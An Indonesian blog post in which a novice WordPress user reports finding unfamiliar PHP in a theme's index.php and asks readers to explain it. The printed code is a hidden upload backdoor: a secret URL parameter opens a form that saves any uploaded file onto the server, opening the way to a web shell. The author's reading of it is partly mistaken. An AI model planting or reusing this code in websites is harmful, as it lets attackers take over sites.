Home » Internet » Wordpress » Tahukah Script PHP untuk Virus Theme WordPress

Tahukah Script PHP untuk Virus Theme WordPress

File index.php theme blog WordPress mengandung script Virus? Blog saya ini terpasang pluggin Antivirus. Secara kebetulan iseng-iseng scan theme WordPress. Ternyata pada file index.php ditemukan script yang oleh pluggin Antivirus dianggap virus. Saya coba cek, ternyata memang ada script php baru yang saya tidak tahu maksudnya. Saya bandingkan dengan file index.php yang masih asli tersimpan di komputer, ternyata script tersebut tidak ada. Dari manakah asalnya? :(

Baru beberapa hari tenang setelah memformat ulang komputer dan menginstall kembali Windows karena bermasalah dengan virus, sekarang sudah dibikin pusing lagi dengan script php theme WordPress yang tanpa permisi “ujug-ujug” (tiba-tiba, Jawa) bersemayam dalam file index.php
Mencari artikel yang membahasnya belum ketemu, sudah muter-muter googling kagak dapat hasil penjelasan dan pencerahannya.

Script php yang terletak pada file index.php theme WordPress sebagai berikut:

<?php if(isset($_GET['t3ll0']))
 {
 echo "<body bgcolor=black>
 <font color=cyan size=3>";
 echo "<hr>";
 echo "<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">
 <label for=\"file\">Filename:</label>
 <input type=\"file\" name=\"file\" id=\"file\" />
 <br />
 <input type=\"submit\" name=\"submit\" value=\"UPLOAD IT\">
 </form>";
 if ($_FILES["file"]["error"] > 0)
 {
 echo "Error: " . $_FILES["file"]["error"] . "<br />";
 }
 else
 {
 echo "Upload: " . $_FILES["file"]["name"] . "<br />";
 echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
 echo "Stored in: " . $_FILES["file"]["tmp_name"];
 }
 if (file_exists("" . $_FILES["file"]["name"]))
 {
 echo $_FILES["file"]["name"] . " already exists. ";
 }
 else
 {
 move_uploaded_file($_FILES["file"]["tmp_name"],
 "" . $_FILES["file"]["name"]);
 echo "Stored in: " . "" . $_FILES["file"]["name"];
 echo"<hr>";
 }
 }
 ?>

Kode di atas pada theme aslinya tidak ada. Dan saya tidak pernah meletakkan (copy-paste) kode tersebut. Sejak kapan kode tersebut duduk manis di theme blog, saya tidak tahu persis. Maksud, arti atau fungsinya juga tidak paham. Kemudian saya memeriksa setiap file dalam theme WordPress, ternyata cuma pada file index.php saja kode tersebut ada, yang lainnya tidak masalah (clean).

Beberapa hal yang mencurigakan menurut blogger pemula seperti saya (tulisan berwarna merah), kalau dipahami kode php tersebut berbunyi: akan mengirim (UPLOAD IT) file yang “submit” dengan batasan size “1024 kb“. Jika file yang diupload ternyata sama maka dibiarkan “already exists“. Jika berbeda maka diupload “move_uploaded_file” pada suatu tempat “Stored in:….” yang saya tidak mengerti maksudnya, kira-kira dibawa kemana gitu…. Cara membaca script ini menggunakan rumus if pada Office Excel :) lha ngertinya itu …..

Atau bisa jadi kode tersebut milik salah satu pluggin yang terinstall pada blog WordPress. Barangkali bukan dari pluggin, karena blog saya yang lain tidak masalah kok, walaupun menggunakan theme yang sama, dan pengelolaannya menggunakan komputer yang sama pula. (Saya masih bersyukur, saat copy-paste kode ke Notepad++ tidak berubah menjadi tengkorak atau gendruwo :lol: ah ga nyambung)

Tidak ingin bermasalah lebih lanjut, script di atas langsung saya hapus, blog kalau akan error sudah persiapan batin :lol: daripada sakit hati di masa yang akan datang. Artikel ini diposting setelah hapus kodenya, saya kasih jeda sekitar 2 jam, agar tahu lebih awal jika ada ketidak beresan. Dan tidak lupa langsung reset password blog, mengganti dengan yang baru, hanya sekedar berjaga-jaga… CPanel di tempat hosting belum sempat memeriksa….

Barangkali Anda ada yang tahu? Tolongin ya… (Kayaknya perlu ikut forum pemrograman nih). Setelah paham Windows menjadi aneh setelah kena virus, kini gilirannya blog yang bertingkah “aneh”, ditandai dengan hadirnya kode yang tak berantah…

Theme WordPress salah satu filenya mengandung script yang dianggap virus oleh pluggin wp Antivirus. Padahal theme wp aslinya tidak mengandung kode tersebut. Dari mana datangnya menjadi sebuah misteri tersendiri, belum ada petunjuk sama sekali. Mungkinkah code php tersebut termasuk makhluk yang “Datang tak diundang, pulang nunggu ditendang“. Salam blogging….?

Share to : Facebook | Twitter | Digg | Google | Technorati | Stumbleupon | Delicious | Reddit |

Artikel terkait :

Random Posts :

Leave a Comment